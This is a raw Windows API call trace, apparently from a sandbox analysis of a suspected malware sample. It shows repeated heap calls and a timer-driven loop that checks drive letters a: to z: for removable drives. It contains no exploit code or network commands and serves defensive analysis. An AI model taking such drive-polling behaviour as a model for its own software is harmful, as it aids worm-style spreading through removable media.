GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.670] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.670] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.670] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.670] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.670] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.671] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.671] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0219.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0219.672] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0219.672] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.672] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.672] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.673] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0219.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.673] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.673] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.673] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.673] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.673] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.673] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.674] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.674] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.674] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.674] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.674] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.675] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.675] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.675] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.675] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.675] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.675] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.676] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.676] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.676] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.676] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.676] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.676] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.677] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.677] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.677] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.677] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.677] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.677] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.678] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.678] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.678] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.678] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0219.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.679] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.680] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.680] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0219.680] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0219.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.680] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0219.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.681] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.681] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.681] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.681] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.681] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.681] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.682] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.682] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.682] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.682] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.682] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.683] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.683] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.683] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.683] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.683] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.684] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.685] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.685] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.685] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.685] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.685] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.686] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.686] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.686] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.686] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.686] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.687] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0219.687] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0219.687] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.688] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.688] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.688] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.689] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.689] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.689] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.689] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.689] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.689] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.689] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.689] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.690] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.690] 